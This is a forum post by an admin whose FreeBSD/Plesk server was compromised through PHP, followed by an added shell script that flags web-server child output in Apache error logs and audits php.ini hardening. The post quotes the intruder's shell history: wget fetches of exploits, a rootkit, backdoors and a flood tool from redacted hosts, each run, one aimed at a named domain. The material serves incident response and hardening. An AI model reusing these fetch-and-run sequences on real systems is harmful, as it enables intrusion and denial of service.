Hacked, now what?
What happened
Last week my FreeBSD 4.9 server with Plesk 7.0.3 installed got "hacked". I say "hacked", because it's more that a script kiddie ran some scripts.
I had some eggdrops and iroffer running from /tmp, installed by user "apache". They apparently came in using an exploit in phpBB or just PHP.
In my error_log I found this:
Code:
cd: can't cd to tmp
cd: can't cd to tmp
md: not found
--20:53:42-- http://cd/
=> `index.html'
Resolving cd... failed: No address associated with hostname.
/tmp: Unsupported scheme.
FINISHED --20:53:42--
Downloaded: 0 bytes in 0 files
cd: can't cd to /tmp/iroffer1.4.b01.tgz
iroffer: not found
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
--16:05:49-- http://*******.com/r0nin
=> `r0nin.1'
Resolving ******.com... done.
Connecting to ******.com[**.**.**.**]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
0K 708.98 KB/s
16:05:50 (708.98 KB/s) - `r0nin.1' saved [726]
I also had PHP version 4.3.4 installed...
So they first used wget to download "r0nin", but because "r0nin" already existed, wget renamed it to "r0nin.1". The eggdrops I found were installed at ~ Nov. 14, but this is Nov 29th. The first "hacker" edited the logs so I couldn't find info on him, but I know he did install "r0nin" because that one already existed, as you can see above.
These are the commands that I found in .bash_history of the 2nd "hacker":
Code:
ls
cd tmp
ls
wget http://*****/exploits/local/remap
chmod 777 remap
./remap
./r0nin
wget http://*****/UNIX/penetration/rootkits/kbdv3.c
gcc kbdv3.c
wget http://*****/codes/cancer
chmod 777 cancer
./cancer
./cancer index.txt
./cancer users.txt
ls
./cancer xx.txt
wget http://*****/exploits/backdoor/dc
chmod 777 dc
./dc
./dc localhost 677
./dc localhost 1666
uname -r
wget http://******/exploits/ddos/f3
chmod 777 f3
./f3
./f3 malianteo.com 677005 800
./f3 malianteo.com 65535 800
uname -ar
uname -ar
Linux ***** 2.4.2 FreeBSD 4.9-RELEASE #2: Wed Mar 3 21:12:13 CET 2004
erik@Ix i386 unknown
id
wget http://*****/exploits/backdoor/cgi
chmod 777 cgi
./cgi
exit
cd tmp
wget http://*****/bsdlocal
chmod 777 bsdlocal
ls
./bsdlocal
ren
rem
rn
rename
What did I do to stop this
- I removed all the crap out of /tmp and /var/tmp.
- killed the processes they started
- had a guy looking at my server, he removed some more crap
- ran chkrootkit, nothing was found
- monitored my server for few days to make sure no new processes were started
- removed the cronjob they installed (it wasn't working anymore anyway, since it pointed to some file in /var/tmp which is gone now)
What did I do to prevent this from happening again
Since this server is used a lot and I'm not able to reinstall it "just like that", I don't really want to reinstall the entire server, even though I know that is the best thing to do. The server was configured by an "experienced" admin who set up security tight, and since I didn't find anything outside of /tmp/ and /var/tmp, I'm pretty sure that those are the only directories they were able to access.
- I installed plesk patch 7.0.4
- manually upgraded php to 4.3.9
- Changed php.ini: disabled functions like system, popen, exec etc.
- disabled allow_url_fopen
- disabled expose_php
- chmodded wget so only root can use it
- chmodded lynx so only root can use it
What more can I do?
I was thinking of mounting /tmp and /var/tmp as noexec, but since it's not a partition I can only do it by making a large file... but they can also just execute scripts from the base directory of the website (if they hack a website), so that's useless I guess...
I was thinking about the following steps:
- installing a firewall
- chmodding chmod so that only root can use chmod, so they can't do chmod +x to run a file, but I think it's also necessary for FTP...
- chmod gcc to 700... but they can also just upload compiled versions, so that's not too much help
That's it. Does anyone else have tips on what I can do?
As I already said, reinstalling is really not an option...
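The post above contains two things worth turning into repeatable checks: the detection clue (shell and wget output showing up inside Apache's error_log, plus the malformed POST /info.php entries) and the php.ini hardening steps. The POSIX sh script below is an added example, not part of the original post or of Plesk/PHP: scan_error_log flags error_log lines that are not ordinary Apache entries (which means stdout/stderr of a process the web server spawned) together with the "erroneous characters after protocol string" entries, and audit_php_ini verifies allow_url_fopen, expose_php and disable_functions. The function names, file names, the sample error_log and the two php.ini fragments are constructed for the example; the sample lines only model the output quoted in the post.

```shell
#!/bin/sh
# Added example (not from the original post). Works with FreeBSD /bin/sh, dash or bash.

# ini_value FILE KEY: print the trimmed, lowercased value of directive KEY in a
# php.ini file; prints nothing if the directive is absent or commented out.
ini_value() {
    awk -v key="$2" '
        /^[ \t]*[;#]/       { next }            # comment line
        index($0, "=") == 0 { next }            # not a "key = value" line
        {
            k = substr($0, 1, index($0, "=") - 1)
            v = substr($0, index($0, "=") + 1)
            gsub(/[ \t]/, "", k)
            sub(/;.*/, "", v)                   # strip trailing comment
            gsub(/[ \t]/, "", v)
            if (k == key) { print tolower(v); exit }
        }' "$1"
}

# audit_php_ini FILE: return 0 only when the hardening settings from the post are
# all present. An absent allow_url_fopen/expose_php counts as a failure, because
# PHP 4 defaults both to On.
audit_php_ini() {
    ini=$1
    rc=0
    for directive in allow_url_fopen expose_php; do
        v=$(ini_value "$ini" "$directive")
        case "$v" in
            off|0|false|no) ;;
            *) echo "$ini: $directive should be Off (found '${v:-unset}')"; rc=1 ;;
        esac
    done
    df=$(ini_value "$ini" disable_functions)
    for fn in system exec passthru shell_exec popen proc_open; do
        case ",$df," in
            *",$fn,"*) ;;
            *) echo "$ini: disable_functions lacks $fn"; rc=1 ;;
        esac
    done
    return $rc
}

# scan_error_log FILE: print suspicious error_log lines with a tag. Every normal
# Apache entry starts with "[date]"; anything else in the file was written by a
# child process of the web server (wget banners, "cd: can't cd to tmp", ...).
scan_error_log() {
    awk '
        /^\[/ && /erroneous characters after protocol string/ { print "MALFORMED-REQUEST: " $0; next }
        /^\[/      { next }                     # ordinary Apache entry
        /^[ \t]*$/ { next }                     # blank line
        { print "CHILD-OUTPUT: " $0 }           # output of a spawned process
    ' "$1"
}

# count_suspicious FILE: number of lines scan_error_log would report.
count_suspicious() {
    scan_error_log "$1" | wc -l | tr -d '[:space:]'
}

# write_samples DIR: constructed sample inputs for the example (not real data).
write_samples() {
    cat > "$1/weak.ini" <<'EOF'
; php.ini fragment with the PHP 4 defaults the post started from
allow_url_fopen = On
expose_php = On
disable_functions =
EOF
    cat > "$1/hardened.ini" <<'EOF'
; php.ini fragment after the changes listed in the post
allow_url_fopen = Off
expose_php = Off
disable_functions = system, exec, passthru, shell_exec, popen, proc_open
EOF
    cat > "$1/error_log" <<'EOF'
[Mon Nov 29 01:10:02 2004] [notice] Apache/1.3.29 configured -- resuming normal operations
cd: can't cd to tmp
--20:53:42--  http://example.invalid/r0nin
Resolving example.invalid... failed: No address associated with hostname.
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter
[Mon Nov 29 01:20:11 2004] [error] [client 10.0.0.5] File does not exist: /usr/local/www/data/favicon.ico
EOF
}

# Stand-alone demo: build the samples in a scratch directory and run both checks.
demo_dir=$(mktemp -d)
write_samples "$demo_dir"
echo "== suspicious error_log lines =="
scan_error_log "$demo_dir/error_log"
echo "== php.ini audit =="
for f in weak.ini hardened.ini; do
    if audit_php_ini "$demo_dir/$f"; then echo "$f: OK"; else echo "$f: NOT hardened"; fi
done
rm -rf "$demo_dir"
```

On a live box, point scan_error_log at the real Apache error log (the path depends on the Plesk/Apache layout, so substitute your own) and audit_php_ini at the php.ini PHP actually loads, which `php -i | grep php.ini` reports; the scan deliberately treats any non-Apache line as suspicious, so a few harmless module messages may be listed alongside the real finds.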
